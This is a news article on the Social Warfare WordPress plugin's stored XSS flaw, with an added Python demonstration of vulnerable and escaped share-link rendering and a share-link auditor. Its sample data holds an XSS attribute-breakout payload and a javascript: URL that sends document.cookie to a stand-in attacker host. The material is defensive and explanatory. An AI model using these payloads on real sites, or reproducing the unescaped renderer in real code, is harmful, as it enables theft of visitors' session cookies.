WordPress plugin Social Warfare removed due to major vulnerability

According to a post on the WordPress security news site Wordfence, the popular WordPress social sharing plugin Social Warfare has been removed from the WordPress.org plugin repository because of a stored cross-site scripting (XSS) vulnerability. The flaw was disclosed by an unnamed researcher, whose published findings showed that it allows malicious JavaScript to be injected into the social media share links the plugin adds to blog posts.
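The mechanism described above is the classic stored XSS pattern: a value the plugin keeps in its settings is written straight into the share-link markup, so whoever controls that value controls what every visitor's browser executes. The following is an added example, not code from Social Warfare or Wordfence, that models the pattern in Python rather than the plugin's PHP so it runs stand-alone: a vulnerable renderer beside a hardened one (the WordPress equivalents of the escaping steps are esc_url() and esc_attr()), plus the check a site administrator would want while attacks are live, an audit of a rendered page's share anchors for inline event handlers, script-bearing URL schemes, or an unexpected destination host. The sample values, the injected payload, the page markup, the "share" class convention and the allowed-host list are all constructed assumptions for the demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, urlsplit

# Constructed sample data. A real plugin would read these from the WordPress
# options table; INJECTED_HANDLE is an illustrative attacker-controlled value
# that closes the href attribute and adds an inline event handler.
POST_URL = "https://example.com/2019/03/hello-world/"
SAFE_HANDLE = "wordfence"
INJECTED_HANDLE = '" onmouseover="alert(document.cookie)" data-x="'

# Hosts a share link on this site is expected to point at (site-specific assumption).
ALLOWED_SHARE_HOSTS = {"twitter.com", "www.facebook.com", "pinterest.com", "www.linkedin.com"}


def render_share_link_vulnerable(post_url, handle):
    """Stored-XSS pattern: a stored option is dropped straight into the markup."""
    return ('<a class="share-twitter" href="https://twitter.com/intent/tweet?url='
            + post_url + "&via=" + handle + '">Tweet</a>')


def render_share_link_hardened(post_url, handle):
    """Percent-encode each query value, then escape the finished URL as an
    HTML attribute. In WordPress this is the esc_url() / esc_attr() pairing."""
    href = ("https://twitter.com/intent/tweet?url=" + quote(post_url, safe="")
            + "&via=" + quote(handle, safe=""))
    return '<a class="share-twitter" href="' + html.escape(href, quote=True) + '">Tweet</a>'


class ShareLinkAuditor(HTMLParser):
    """Collects share anchors that carry inline event handlers, a javascript:/
    data:/vbscript: URL, or a destination host outside the allow-list."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (href, [reasons])

    def handle_starttag(self, tag, attr_list):
        if tag != "a":
            return
        attrs = {name: (value or "") for name, value in attr_list}
        # Assumption: the plugin's share buttons carry "share" in their class.
        if "share" not in attrs.get("class", ""):
            return
        href = attrs.get("href", "")
        parts = urlsplit(href)
        reasons = ["inline event handler " + n for n in attrs if n.startswith("on")]
        if parts.scheme.lower() in {"javascript", "data", "vbscript"}:
            reasons.append(parts.scheme + ": URL")
        elif parts.hostname and parts.hostname not in ALLOWED_SHARE_HOSTS:
            reasons.append("unexpected host " + parts.hostname)
        if reasons:
            self.findings.append((href, reasons))


def audit_share_links(page_html):
    """Run the auditor over a rendered page and return its findings."""
    auditor = ShareLinkAuditor()
    auditor.feed(page_html)
    auditor.close()
    return auditor.findings


# Constructed page: one clean share link, one link poisoned through the
# vulnerable renderer, and one whose href was replaced with a javascript: URL.
SAMPLE_PAGE = "\n".join([
    '<nav><a href="https://example.com/about/">About</a></nav>',
    '<div class="share-buttons">',
    render_share_link_hardened(POST_URL, SAFE_HANDLE),
    render_share_link_vulnerable(POST_URL, INJECTED_HANDLE),
    '<a class="share-facebook" href="javascript:location=\'https://evil.example/?\'+document.cookie">Share</a>',
    "</div>",
])

if __name__ == "__main__":
    for href, reasons in audit_share_links(SAMPLE_PAGE):
        print(href[:60], "->", "; ".join(reasons))
```

Run against a site's saved post HTML (for example the output of curl), the audit reports two of the three share anchors: the one rendered from the injected option, because its attribute breakout produced an onmouseover handler, and the one pointing at a javascript: URL. The hardened renderer fed the same payload yields a single, inert href, which is the property the escaping step buys.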

The issue is significant because the researcher found the plugin to be active on more than 70,000 websites. Compounding it, the vulnerability is confirmed to be under active exploitation in the wild, a point Wordfence expanded on in the following statement:

The Defiant Threat Intelligence team has already identified attacks against this vulnerability, and has deployed a firewall rule to prevent its exploitation. Premium users gain immediate access to the new rule, and after a thirty-day delay it will be available to Free users. Because this vulnerability has yet to be patched, it is recommended that site administrators deactivate the plugin until a patch is released.

At this time, we are refraining from publicizing details of the flaw and the attacks against it. At such time that the vendor makes a patch available, we will produce a follow-up post with further information.

In a follow-up comment to the Wordfence article, Jason Wiser of Warfare Plugins had this to say about how the company is responding to the issue:

Our entire development team is currently working to issue a patch and hope to have it released within the hour, but in the meantime we recommend disabling Social Warfare and Social Warfare Pro on your website.

This patch, once available, will be listed as version 3.5.3, and you will be able to download and apply the update even while Social Warfare and Social Warfare Pro are disabled.

Wiser directed users to check the company's support page and Twitter account for "up to the minute updates on this issue."

This is not the first time a WordPress plugin has raised security concerns, but given Social Warfare's install base this one could have been far worse. Had the researcher not found the vulnerability when they did, there is no telling how great the damage would have been. Stored XSS is one of the oldest classes of web application attack, and because the injected script is served inside share links on every affected post, it runs in the browser of every visitor to those posts, so one has to wonder how the flaw went unnoticed for so long. There is now a clear plan of action for users and developers alike: deactivate Social Warfare and Social Warfare Pro until the 3.5.3 update is available, apply it, and, since attacks are already confirmed, review the share links on published posts for script that should not be there.

Featured image: Shutterstock
